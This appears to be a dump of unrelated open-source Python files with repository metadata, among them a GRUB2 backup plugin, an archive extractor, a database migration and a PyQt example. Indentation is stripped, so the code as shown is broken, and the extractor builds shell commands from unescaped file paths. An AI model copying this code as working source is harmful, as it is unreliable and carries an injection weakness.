def toXML(self, writer, ttFont):
writer.begintag("kernsubtable", format=self.format)
writer.newline()
writer.comment("unknown 'kern' subtable format")
writer.newline()
writer.dumphex(self.data)
writer.endtag("kernsubtable")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.decompile(readHex(content), ttFont)
kern_classes = {0: KernTable_format_0}
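# Usage sketch (added for illustration; the font path is hypothetical, and a given font
# may lack a 'kern' table or use a different subtable format).
def _example_lookup_kern_pair(font_path, left="A", right="V"):
    # Load a font, fetch its 'kern' table, and look up one pair in a format 0 subtable.
    from fontTools.ttLib import TTFont
    font = TTFont(font_path)
    if "kern" not in font:
        return None
    subtable = font["kern"].getkern(0)  # getkern() is defined on table__k_e_r_n above
    if subtable is None:
        return None
    # KernTable_format_0.__getitem__ raises KeyError for pairs that are not kerned,
    # so use the underlying dict's .get() for a quiet lookup.
    return subtable.kernTable.get((left, right))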
| 7c08ba7b137391ad74c388cc0e521aa92bf20d8a | 0f96e82782069113767e0322cd29629503fc2aad | /src/weresync/plugins/weresync_grub2.py | 5a123ee9e65f741c8b8dc7702ea24c0368cc0007 | ["Apache-2.0"] | permissive | DonyorM/weresync | f82afe39d03fd8a8f48562130ee856b2c199dfbf | 3c0094cb386358589c48bf48cb60f20acf961f9c | refs/heads/master | 2022-12-10T20:02:05.332807 | 2021-02-20T23:18:34 | 2021-02-20T23:18:34 | 72,903,177 | 225 | 19 | Apache-2.0 | 2022-12-08T05:15:41 | 2016-11-05T03:37:34 | Python | UTF-8 | Python | false | false | 6,564 | py | weresync_grub2.py |
# Copyright 2016 Daniel Manila
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Installs the Grub2 bootloader. This works on both UEFI and MBR systems."""
from weresync.plugins import IBootPlugin
import weresync.plugins as plugins
import weresync.daemon.device as device
from weresync.exception import CopyError, DeviceError
import subprocess
import os
import sys
import logging
LOGGER = logging.getLogger(__name__)
class GrubPlugin(IBootPlugin):
"""Plugin to install the grub2 bootloader. Does not install grub legacy."""
def __init__(self):
super().__init__("grub2", "Grub2")
def get_help(self):
return __doc__
def install_bootloader(self, source_mnt, target_mnt, copier,
excluded_partitions=[],
boot_partition=None, root_partition=None,
efi_partition=None):
if efi_partition is not None:
import weresync.plugins.weresync_uuid_copy as uuc
# UEFI systems tend to only need a UUID copy. No sense in not
# reusing old code.
uuc.UUIDPlugin().install_bootloader(source_mnt, target_mnt, copier,
excluded_partitions,
boot_partition,
root_partition, efi_partition)
return
if root_partition is None and boot_partition is None:
# This for loop searches for a partition with a /boot/grub folder
# and it assumes it is the root partition
for i in copier.target.get_partitions():
try:
mount_point = copier.target.mount_point(i)
if mount_point is None:
copier.target.mount_partition(i, target_mnt)
mount_point = target_mnt
if os.path.exists(mount_point +
("/" if not mount_point.endswith("/")
else "") + "boot/grub"):
root_partition = i
break
else:
copier.target.unmount_partition(i)
except DeviceError as ex:
LOGGER.warning("Could not mount partition {0}. "
"Assumed to not be the partition grub "
"is on.".format(i))
LOGGER.debug("Error info:\n", exc_info=sys.exc_info())
else: # No partition found
raise CopyError("Could not find partition with "
"'boot/grub' folder on device {0}".format(
copier.target.device))
# These variables are flags that allow the plugin to know if it mounted
# any partitions and then clean up properly if it did
mounted_here = False
boot_mounted_here = False
try:
if root_partition is not None:
mount_loc = copier.target.mount_point(root_partition)
if mount_loc is None:
plugins.mount_partition(copier.target, copier.lvm_target,
root_partition, target_mnt)
mounted_here = True
mount_loc = target_mnt
else:
mount_loc = target_mnt
# This line avoids double slashes in path
mount_loc += "/" if not mount_loc.endswith("/") else ""
if boot_partition is not None:
boot_folder = mount_loc + "boot"
if not os.path.exists(boot_folder):
os.makedirs(boot_folder)
plugins.mount_partition(copier.target, copier.lvm_target,
boot_partition, boot_folder)
boot_mounted_here = True
print(_("Updating Grub"))
grub_cfg = mount_loc + "boot/grub/grub.cfg"
old_perms = os.stat(grub_cfg)[0]
try:
with open(grub_cfg, "r+") as grubcfg:
cfg = grubcfg.read()
LOGGER.debug("UUID Dicts: " + str(copier.get_uuid_dict()))
final = device.multireplace(cfg, copier.get_uuid_dict())
grubcfg.seek(0)
grubcfg.write(final)
grubcfg.truncate()
grubcfg.flush()
finally:
os.chmod(grub_cfg, old_perms)
print(_("Installing Grub"))
grub_command = ["grub-install",
"--boot-directory=" + mount_loc + "boot",
"--recheck",
"--target=i386-pc", copier.target.device]
LOGGER.debug("Grub command: " + " ".join(grub_command))
grub_install = subprocess.Popen(grub_command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
install_output, install_error = grub_install.communicate()
if grub_install.returncode != 0:
raise DeviceError(copier.target.device,
"Error installing grub.",
str(install_output,
"utf-8"))
print(_("Consider running update-grub on your backup. WereSync"
" copies can sometimes fail to capture all the nuances of a"
" complex system."))
print(_("Cleaning up."))
finally:
# This block cleans up any mounted partitions
if boot_mounted_here:
copier.target.unmount_partition(boot_partition)
if mounted_here:
copier.target.unmount_partition(root_partition)
print(_("Finished!"))
| 94a91e1402d22fd2405499c05d4bd63a67354dbb | 6189f34eff2831e3e727cd7c5e43bc5b591adffc | /WebMirror/management/rss_parser_funcs/feed_parse_extractLnAddiction.py | a6e92bc8872250140f07f22680e3d2ede31d3062 | ["BSD-3-Clause"] | permissive | fake-name/ReadableWebProxy | 24603660b204a9e7965cfdd4a942ff62d7711e27 | ca2e086818433abc08c014dd06bfd22d4985ea2a | refs/heads/master | 2023-09-04T03:54:50.043051 | 2023-08-26T16:08:46 | 2023-08-26T16:08:46 | 39,611,770 | 207 | 20 | BSD-3-Clause | 2023-09-11T15:48:15 | 2015-07-24T04:30:43 | Python | UTF-8 | Python | false | false | 451 | py | feed_parse_extractLnAddiction.py |
def extractLnAddiction(item):
"""
# Ln Addiction
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or 'preview' in item['title'].lower():
return None
if ('Hissou Dungeon Unei Houhou' in item['tags'] or 'Hisshou Dungeon Unei Houhou' in item['tags']) and (chp or frag):
return buildReleaseMessageWithType(item, 'Hisshou Dungeon Unei Houhou', vol, chp, frag=frag, postfix=postfix)
return False
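# Example inputs (added for illustration; titles and tags are made up): an item such as
# {'title': 'Hisshou Dungeon Unei Houhou chapter 12', 'tags': ['Hisshou Dungeon Unei Houhou']}
# would yield a release message for that series; a title containing 'preview' (or one that
# parses to neither a chapter nor a volume) returns None, and anything else falls through
# to False.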
| e4af2cf7af21db7a156ef80d842f59e6d42977df | 3bba998ece193dd4594059025d0ebdc86a982e18 | /lib/rucio/db/sqla/migrate_repo/versions/9a45bc4ea66d_add_vp_table.py | 74351e2405bd3c09aa3bff6da3edd6d1e09c5575 | ["Apache-2.0"] | permissive | rucio/rucio | d3320db046866be616f534baecdfdb2b28c8d0f1 | 7f0d229ac0b3bc7dec12c6e158bea2b82d414a3b | refs/heads/master | 2023-09-02T15:17:54.376456 | 2023-08-14T12:54:06 | 2023-08-21T12:42:21 | 109,819,364 | 232 | 378 | Apache-2.0 | 2023-09-14T12:52:36 | 2017-11-07T10:15:12 | Python | UTF-8 | Python | false | false | 1,962 | py | 9a45bc4ea66d_add_vp_table.py |
# -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' add VP table '''
import sqlalchemy as sa
from alembic import context
from alembic.op import create_primary_key, create_table, create_foreign_key, drop_table
from rucio.common.schema import get_schema_value
from rucio.db.sqla.types import JSON
# Alembic revision identifiers
revision = '9a45bc4ea66d'
down_revision = '739064d31565'
def upgrade():
'''
Upgrade the database to this revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
create_table('virtual_placements',
sa.Column('scope', sa.String(get_schema_value('SCOPE_LENGTH'))),
sa.Column('name', sa.String(get_schema_value('NAME_LENGTH'))),
sa.Column('placements', JSON()),
sa.Column('created_at', sa.DateTime),
sa.Column('updated_at', sa.DateTime)
)
create_primary_key('VP_PK', 'virtual_placements', ['scope', 'name'])
create_foreign_key('VP_FK', 'virtual_placements', 'dids',
['scope', 'name'], ['scope', 'name'])
def downgrade():
'''
Downgrade the database to the previous revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
drop_table('virtual_placements')
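# Usage note (added for illustration; assumes a configured alembic.ini for the Rucio
# database): this revision is applied and reverted with the standard Alembic CLI, e.g.
#   alembic upgrade 9a45bc4ea66d
#   alembic downgrade 739064d31565
# On dialects other than oracle/mysql/postgresql both functions are intentionally no-ops.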
| 1a594ca6e89eabdb814125220a3a59f14149ac82 | 317814366a23277bea87ce6dde4441a53dbb9996 | /lib/build_pack_utils/zips.py | e95b1911bede40c22ff041e0ac533dec1bc68738 | ["Apache-2.0"] | permissive | cloudfoundry/php-buildpack | c163ffbcc733aff454a349dbf2d64843c102ccbd | 4bd55b99bafdf81864ed0b0014e064fc585ad7dd | refs/heads/master | 2023-09-03T21:00:20.596401 | 2023-08-23T18:11:25 | 2023-08-23T18:12:02 | 15,767,202 | 140 | 464 | Apache-2.0 | 2023-09-07T16:07:46 | 2014-01-09T13:19:03 | Python | UTF-8 | Python | false | false | 9,325 | py | zips.py |
import os
import gzip
import bz2
import zipfile
import shutil
import logging
import tempfile
from functools import partial
from subprocess import Popen
from subprocess import PIPE
class UnzipUtil(object):
"""Extract files from compressed archives."""
def __init__(self, config):
self._ctx = config
self._log = logging.getLogger('zips')
def _unzip(self, zipFile, intoDir, strip):
"""Extract files from a zip archive.
Extract all of the files from the archive into the given
        folder, optionally stripping off the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to zip archive
:param intoDir: full path to root of extracted files
:param strip: trim leading element from path in archive
"""
if strip:
tmpDir = tempfile.mkdtemp(prefix='zips-')
else:
tmpDir = intoDir
zipIn = None
try:
zipIn = zipfile.ZipFile(zipFile, 'r')
zipIn.extractall(tmpDir)
if strip:
members = zipIn.namelist()
if len(members) > 0:
firstDir = members[0].split('/')[0]
if all([firstDir == m.split('/')[0] for m in members]):
moveFrom = os.path.join(tmpDir, firstDir)
if os.path.exists(moveFrom) and \
os.path.isdir(moveFrom):
for item in os.listdir(moveFrom):
shutil.move(os.path.join(moveFrom, item),
intoDir)
return intoDir
self._log.warn("Zip file does not need stripped")
for item in os.listdir(tmpDir):
shutil.move(os.path.join(tmpDir, item), intoDir)
return intoDir
finally:
if zipIn:
zipIn.close()
if intoDir != tmpDir and os.path.exists(tmpDir):
shutil.rmtree(tmpDir)
return intoDir
def _gunzip(self, zipFile, intoDir, strip):
"""Uncompress a gzip'd file.
:param zipFile: full path to gzip'd file
:param intoDir: full path to directory for uncompressed file
:param strip: ignored / not applicable
"""
path = os.path.join(intoDir, os.path.basename(zipFile)[:-3])
zipIn = None
try:
zipIn = gzip.open(zipFile, 'rb')
with open(path, 'wb') as zipOut:
for buf in iter(partial(zipIn.read, 8196), ''):
zipOut.write(buf)
finally:
if zipIn:
zipIn.close()
return path
def _bunzip2(self, zipFile, intoDir, strip):
"""Uncompress a bzip2'd file.
:param zipFile: full path to bzip2'd file
:param intoDir: full path to directory for uncompressed file
        :param strip: ignored / not applicable
"""
path = os.path.join(intoDir, os.path.basename(zipFile)[:-4])
zipIn = None
try:
zipIn = bz2.BZ2File(zipFile, 'rb')
with open(path, 'wb') as zipOut:
for buf in iter(partial(zipIn.read, 8196), ''):
zipOut.write(buf)
finally:
if zipIn:
zipIn.close()
return path
def _tar_bunzip2(self, zipFile, intoDir, strip):
"""Extract files from a bzip2'd tar archive.
Extract all of the files from the archive into the given
        folder, optionally stripping off the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to bzip'd tar archive
:param intoDir: full path to root of extracted files
:param strip: set `--strip-components 1` argument to tar
"""
return self._tar_helper(zipFile, intoDir, 'bz2', strip)
def _tar_gunzip(self, zipFile, intoDir, strip):
"""Extract files from a gzip'd tar archive.
Extract all of the files from the archive into the given
        folder, optionally stripping off the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to gzip'd tar archive
:param intoDir: full path to root of extracted files
:param strip: set `--strip-components 1` argument to tar
"""
return self._tar_helper(zipFile, intoDir, 'gz', strip)
def _untar(self, zipFile, intoDir, strip):
"""Extract files from a tar archive.
Extract all of the files from the archive into the given
        folder, optionally stripping off the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to tar archive
:param intoDir: full path to root of extracted files
:param strip: set `--strip-components 1` argument to tar
"""
return self._tar_helper(zipFile, intoDir, None, strip)
def _tar_helper(self, zipFile, intoDir, compression, strip):
"""Uncompress and extract files from the archive.
Uncompress and extract all of the files from the archive into
the given folder, optionally stripping off the first element
of the path.
:param zipFile: full path to possibly compressed tar archive
:param intoDir: full path to root of extracted files
:param compression: type of compression (None, 'gz' or 'bz2')
:param strip: set `--strip-components 1` argument to tar
"""
# build command
cmd = []
if compression == 'gz':
cmd.append('gunzip -c %s' % zipFile)
elif compression == 'bz2':
cmd.append('bunzip2 -c %s' % zipFile)
if strip:
if compression is None:
cmd.append('tar xf %s --strip-components 1' % zipFile)
else:
cmd.append('tar xf - --strip-components 1')
else:
if compression is None:
cmd.append('tar xf %s' % zipFile)
else:
cmd.append('tar xf -')
command = (len(cmd) > 1) and ' | '.join(cmd) or ''.join(cmd)
# run it
cwd = os.getcwd()
try:
if not os.path.exists(intoDir):
os.makedirs(intoDir)
os.chdir(intoDir)
if os.path.exists(zipFile):
proc = Popen(command, stdout=PIPE, shell=True)
output, unused_err = proc.communicate()
retcode = proc.poll()
if retcode:
raise RuntimeError("Extracting [%s] failed with code [%d]"
% (zipFile, retcode))
finally:
os.chdir(cwd)
return intoDir
def _pick_based_on_file_extension(self, zipFile):
"""Pick extraction method based on file extension.
:param zipFile: archive to extract
"""
if zipFile.endswith('.tar.gz') or zipFile.endswith('.tgz'):
return self._tar_gunzip
if zipFile.endswith('.tar.bz2'):
return self._tar_bunzip2
if zipFile.endswith('.tar'):
return self._untar
if zipFile.endswith('.gz'):
return self._gunzip
if zipFile.endswith('.bz2'):
return self._bunzip2
if zipFile.endswith('.zip') and zipfile.is_zipfile(zipFile):
return self._unzip
if zipFile.endswith('.war') and zipfile.is_zipfile(zipFile):
return self._unzip
if zipFile.endswith('.jar') and zipfile.is_zipfile(zipFile):
return self._unzip
def extract(self, zipFile, intoDir, strip=False, method=None):
"""Extract files from the archive.
Extract all of the files from the given archive. Files are
placed into the directory specified. Optionally, the leading
element of the path used by the files in the archive can be
stripped off.
        By default, the method will decide how to extract the files
based on the file extension. If you need to manually instruct
it how to extract the files, you can pass in a helper method.
Helper methods would generally be one of these methods, which
are available on this class.
* _untar
* _tar_gunzip
* _tar_bunzip2
* _bunzip2
* _gunzip
* _unzip
However you can pass in any method that you like, which is
convenient if you need to extract files from an unsupported
archive type.
:param zipFile: full path to archive file
:param intoDir: full path to root of extracted files
:param strip: strip leading element of archive path
(Default value = False)
:param method: method used to extract files from archive
(Default value = None)
"""
self._log.info("Extracting [%s] into [%s]", zipFile, intoDir)
if not method:
method = self._pick_based_on_file_extension(zipFile)
return method(zipFile, intoDir, strip)
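# Usage sketch (added for illustration; paths are hypothetical):
#   util = UnzipUtil({})                                   # the config dict is only stored as self._ctx here
#   util.extract('/tmp/build/app.tar.gz', '/tmp/app')      # dispatches to _tar_gunzip by extension
#   util.extract('/tmp/build/app.zip', '/tmp/app', strip=True,
#                method=util._unzip)                       # force a specific extractor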
| fbedded06b14d50134fd9049c6de58dfce0a7a99 | a4269b96a9eba49bbe692733d6777ec1917ef629 | /semana-04/scripts/3-eventos-y-señales-ejemplo_1.py | ead3bab58740119072f457a54207556ad6a66527 | [] | no_license | IIC2233/contenidos | 7bbc687c10d5fa2f394891507cf733f24b14080f | ee49033e3aa382f1dcbd03004601a7c084f824ab | refs/heads/main | 2023-08-29T10:15:56.430976 | 2023-08-22T04:35:17 | 2023-08-22T04:37:00 | 286,314,095 | 118 | 193 | null | 2020-10-13T16:55:19 | 2020-08-09T20:45:00 | Jupyter Notebook | UTF-8 | Python | false | false | 2,311 | py | 3-eventos-y-señales-ejemplo_1.py |
import sys
from PyQt6.QtWidgets import (QApplication, QWidget, QPushButton, QLabel,
QGridLayout, QVBoxLayout)
class MiVentana(QWidget):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.init_gui()
def init_gui(self):
self.label1 = QLabel('Status:', self)
self.grilla = QGridLayout()
valores = ['1', '2', '3',
'4', '5', '6',
'7', '8', '9',
'0', 'CE', 'C']
posiciones = [(i, j) for i in range(4) for j in range(3)]
for posicion, valor in zip(posiciones, valores):
boton = QPushButton(valor, self)
"""
Aquí conectamos el evento clicked() de cada boton con el slot
correspondiente. En este ejemplo todos los botones usan el
mismo slot (self.boton_clickeado).
"""
boton.clicked.connect(self.boton_clickeado)
self.grilla.addWidget(boton, *posicion)
vbox = QVBoxLayout()
vbox.addWidget(self.label1)
vbox.addLayout(self.grilla)
self.setLayout(vbox)
self.move(300, 150)
self.setWindowTitle('Calculator')
def boton_clickeado(self):
"""
Esta función se ejecuta cada vez que uno de los botones de la grilla
es presionado. Cada vez que el botón genera el evento, la función inspecciona
cual botón fue presionado y recupera la posición en que se encuentra en
la grilla.
"""
        # sender() returns the object that was clicked.
        # Now the variable boton references a QPushButton instance
boton = self.sender()
        # Get the identifier (index) of the element in the grid
idx = self.grilla.indexOf(boton)
        # With that identifier we obtain the item's position in the grid
posicion = self.grilla.getItemPosition(idx)
# Actualizamos label1
self.label1.setText(f'Status: Presionado boton {idx}, en fila/columna: {posicion[:2]}.')
if __name__ == '__main__':
def hook(type, value, traceback):
print(type)
print(traceback)
sys.__excepthook__ = hook
app = QApplication([])
form = MiVentana()
form.show()
sys.exit(app.exec())
|
f44c0e93d0e91d3264847c1af7b7bacd366d5176
|
04f5e5e2536f05f5dfeff9747322f85b0c62886b
|
/experiments/661k_genomes/scan_genomes_minmers.py
|
5d1f32aea0753c81fffc168c0286b73a74d41372
|
[
"MIT"
] |
permissive
|
ekimb/rust-mdbg
|
dba6355580ef019b5b65d6ccece445afe45157ca
|
985ba674f9da0ff440b0330fd1e2b1de92226305
|
refs/heads/master
| 2023-05-12T04:47:17.340513
| 2023-01-12T10:14:00
| 2023-01-12T11:05:47
| 310,619,686
| 163
| 14
|
MIT
| 2022-02-22T17:37:39
| 2020-11-06T14:29:44
|
Rust
|
UTF-8
|
Python
| false
| false
| 2,640
|
py
|
scan_genomes_minmers.py
|
""" purpose: scans stdin for kminmers found in a reference file
stdin format: [seq_id] [list of minimizers]
reference file: many lines, each line is: [seq_id] [list of minimizers to extract kminmers from]
"""
import sys
genome_minspace_filename = sys.argv[1]
k=10
graph_mode = "-g" in sys.argv
from collections import defaultdict
kminmers = defaultdict(list)
#kminmers_sets = set()
for line in open(genome_minspace_filename):
line = line.replace('[','').replace(']','').replace(',','')
ls = line.split()
seq_id = ls[0]
minimizers = tuple(map(int,ls[1:]))
if len(minimizers) < k: continue
for i in range(len(minimizers)-k+1):
kminmer = minimizers[i:i+k]
kminmers[kminmer] += [(seq_id,i)]
kminmers[kminmer[::-1]] += [(seq_id,i)]
#kminmers_sets.add(set(kminmer))
assert(len(kminmer)==10)
# hack for speed
kminmer_str = str(list(kminmer))
kminmer_str_inv = str(list(kminmer[::-1]))
#print(kminmer_str,kminmer_str_inv)
kminmers[kminmer_str] += [(seq_id,i)]
kminmers[kminmer_str_inv] += [(seq_id,i)]
if graph_mode:
for line in sys.stdin:
if line[0] == "#": continue
# 16606 [27472887960080780, 26945328166221359, 83024137861838436, 183455804785478733, 54911163836344167, 170342695321694208, 91112118779713090, 54911163836344167, 83024137861838436, 183455804785478733] GCCGAGAGGCTGAAGGCGCTCCCCTGCTAAGGGAGTATGCGGTCAA AAGCTGCATCCGGGGTTCGAATCCCCGCCTCACCGCCATTTGCATCCGTAGCTCAGCTGGATAGAGTACTCGGCTACGAACCGAGCGGTCGGAGGTTCGAATCCTCCCGGATGCACCATATTCTACGTACTTTCAGCGATGAAGGTATGGAAGAGGTGGCGGTATAACCGCAGGCACCAGGGAGGATAACGTTGCTTTAGCAACGGCCCGAAGGGCGAGCCGCAAGGCGAGTAATCCTCCCGGATGCACCATCT CTTACTTGATATGGCTTTAGTAGCGATATCAATATCAGCAGTAAAATAAATTTTCCCGATGCATCCGTAGCTCAGCTGGATAGAGTACTCGGCTACGAACCGAGCGGTC * * (24, 33)
ls = line.split()
#kminmer = tuple(eval(" ".join(ls[1:k+1])))
kminmer = " ".join(ls[1:k+1])
if kminmer in kminmers:
print("*","*",kminmers[kminmer] + kminmers[kminmer[::-1]])
else:
for line in sys.stdin:
if ":" in line or "Parsing" in line: continue # debug stuff output by mdbg
ls = line.split()
seq_id, minimizers = ls[0], tuple(map(int,ls[1:]))
for i in range(len(minimizers)-k+1):
kminmer = minimizers[i:i+k]
if kminmer in kminmers or kminmer[::-1] in kminmers:
#print("hit!",seq_id,"at pos",i,"found in ref(s)",kminmers[kminmer] + kminmers[kminmer[::-1]])
print(seq_id,i,kminmers[kminmer] + kminmers[kminmer[::-1]])
|
b550ff5fdac059bc0e583bc3d3230fc20e2d91c6
|
3db48713c39b90d5967615e3d1c874d88055ba70
|
/tests/utils/stl-lit/stl-lit.in
|
c9c28dc1fce8ab7f791bc6636659ee8c1cef3900
|
[
"Apache-2.0",
"LLVM-exception",
"LicenseRef-scancode-object-form-exception-to-mit",
"LicenseRef-scancode-unicode",
"MIT",
"LicenseRef-scancode-mit-old-style",
"LicenseRef-scancode-other-permissive",
"CC0-1.0",
"BSL-1.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
microsoft/STL
|
4b1a6a625402e04b857e8dfc3c22efd9bc798f01
|
6c69a73911b33892919ec628c0ea5bbf0caf8a6a
|
refs/heads/main
| 2023-09-04T08:50:17.559497
| 2023-08-31T16:49:43
| 2023-08-31T16:49:43
| 204,593,825
| 9,862
| 1,629
|
NOASSERTION
| 2023-09-14T21:57:47
| 2019-08-27T01:31:18
|
C++
|
UTF-8
|
Python
| false
| false
| 1,016
|
in
|
stl-lit.in
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#===----------------------------------------------------------------------===##
#
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#===----------------------------------------------------------------------===##
import os
import sys
config_map = {}
def map_config(source_dir, site_config):
global config_map
source_dir = os.path.realpath(source_dir)
source_dir = os.path.normcase(source_dir)
site_config = os.path.normpath(site_config)
config_map[source_dir] = site_config
# Make sure we can find the lit package.
sys.path.insert(0, os.path.join("@LLVM_SOURCE_DIR@", 'utils', 'lit'))
@STL_LIT_CONFIG_MAP@
builtin_parameters= {}
builtin_parameters['config_map'] = config_map
if __name__=='__main__':
from lit.main import main
main(builtin_parameters)
|
e869c5d3f81bf03134a538e8647d517b767a9ac0
|
dcbef06d5a00f07756339b9e62c684dec2fee425
|
/nuitka/build/inline_copy/lib/scons-3.1.2/SCons/Tool/applelink.py
|
f432d613b3e97176cdc8edadf4220f1c33f47444
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
Nuitka/Nuitka
|
f9543d8d95bfa0b81d4e60af0dfad99fb72893a4
|
d87faf2f7e1d6ed9bfe4cf8c1d648f34307e33f2
|
refs/heads/develop
| 2023-08-28T14:00:32.861328
| 2023-08-27T09:16:45
| 2023-08-27T09:16:45
| 9,626,741
| 8,573
| 599
|
Apache-2.0
| 2023-09-13T02:49:41
| 2013-04-23T15:40:33
|
Python
|
UTF-8
|
Python
| false
| false
| 8,618
|
py
|
applelink.py
|
"""SCons.Tool.applelink
Tool-specific initialization for Apple's gnu-like linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/applelink.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
import SCons.Util
# Even though the Mac is based on the GNU toolchain, it doesn't understand
# the -rpath option, so we use the "link" tool instead of "gnulink".
from . import link
class AppleLinkInvalidCurrentVersionException(Exception):
pass
class AppleLinkInvalidCompatibilityVersionException(Exception):
pass
def _applelib_versioned_lib_suffix(env, suffix, version):
"""For suffix='.dylib' and version='0.1.2' it returns '.0.1.2.dylib'"""
Verbose = False
if Verbose:
print("_applelib_versioned_lib_suffix: suffix={!r}".format(suffix))
print("_applelib_versioned_lib_suffix: version={!r}".format(version))
if version not in suffix:
suffix = "." + version + suffix
if Verbose:
print("_applelib_versioned_lib_suffix: return suffix={!r}".format(suffix))
return suffix
def _applelib_versioned_lib_soname(env, libnode, version, prefix, suffix, name_func):
"""For libnode='/optional/dir/libfoo.X.Y.Z.dylib' it returns 'libfoo.X.dylib'"""
Verbose = False
if Verbose:
print("_applelib_versioned_lib_soname: version={!r}".format(version))
name = name_func(env, libnode, version, prefix, suffix)
if Verbose:
print("_applelib_versioned_lib_soname: name={!r}".format(name))
major = version.split('.')[0]
(libname,_suffix) = name.split('.')
soname = '.'.join([libname, major, _suffix])
if Verbose:
print("_applelib_versioned_lib_soname: soname={!r}".format(soname))
return soname
def _applelib_versioned_shlib_soname(env, libnode, version, prefix, suffix):
return _applelib_versioned_lib_soname(env, libnode, version, prefix, suffix, link._versioned_shlib_name)
# User programmatically describes how SHLIBVERSION maps to values for compat/current.
_applelib_max_version_values = (65535, 255, 255)
def _applelib_check_valid_version(version_string):
"""
Check that the version # is valid.
X[.Y[.Z]]
where X 0-65535
where Y either not specified or 0-255
where Z either not specified or 0-255
:param version_string:
:return:
"""
parts = version_string.split('.')
if len(parts) > 3:
return False, "Version string has too many periods [%s]"%version_string
if len(parts) <= 0:
return False, "Version string unspecified [%s]"%version_string
for (i, p) in enumerate(parts):
try:
p_i = int(p)
except ValueError:
return False, "Version component %s (from %s) is not a number"%(p, version_string)
if p_i < 0 or p_i > _applelib_max_version_values[i]:
return False, "Version component %s (from %s) is not valid value should be between 0 and %d"%(p, version_string, _applelib_max_version_values[i])
return True, ""
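# Illustrative sketch (not part of the original tool): expected outcomes of
# _applelib_check_valid_version for a few inputs, per the X[.Y[.Z]] rules above.
def _demo_applelib_check_valid_version():
    assert _applelib_check_valid_version("1")[0] is True
    assert _applelib_check_valid_version("1.2.3")[0] is True
    assert _applelib_check_valid_version("1.2.3.4")[0] is False      # too many components
    assert _applelib_check_valid_version("70000.1.1")[0] is False    # X exceeds 65535
    assert _applelib_check_valid_version("1.300.1")[0] is False      # Y exceeds 255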
def _applelib_currentVersionFromSoVersion(source, target, env, for_signature):
"""
A generator function to create the -Wl,-current_version flag if needed.
If env['APPLELINK_NO_CURRENT_VERSION'] contains a true value no flag will be generated
Otherwise if APPLELINK_CURRENT_VERSION is not specified, env['SHLIBVERSION']
will be used.
:param source:
:param target:
:param env:
:param for_signature:
:return: A string providing the flag to specify the current_version of the shared library
"""
if env.get('APPLELINK_NO_CURRENT_VERSION', False):
return ""
elif env.get('APPLELINK_CURRENT_VERSION', False):
version_string = env['APPLELINK_CURRENT_VERSION']
elif env.get('SHLIBVERSION', False):
version_string = env['SHLIBVERSION']
else:
return ""
version_string = ".".join(version_string.split('.')[:3])
valid, reason = _applelib_check_valid_version(version_string)
if not valid:
raise AppleLinkInvalidCurrentVersionException(reason)
return "-Wl,-current_version,%s" % version_string
def _applelib_compatVersionFromSoVersion(source, target, env, for_signature):
"""
A generator function to create the -Wl,-compatibility_version flag if needed.
If env['APPLELINK_NO_COMPATIBILITY_VERSION'] contains a true value no flag will be generated
Otherwise if APPLELINK_COMPATIBILITY_VERSION is not specified
the first two parts of env['SHLIBVERSION'] will be used with a .0 appended.
:param source:
:param target:
:param env:
:param for_signature:
:return: A string providing the flag to specify the compatibility_version of the shared library
"""
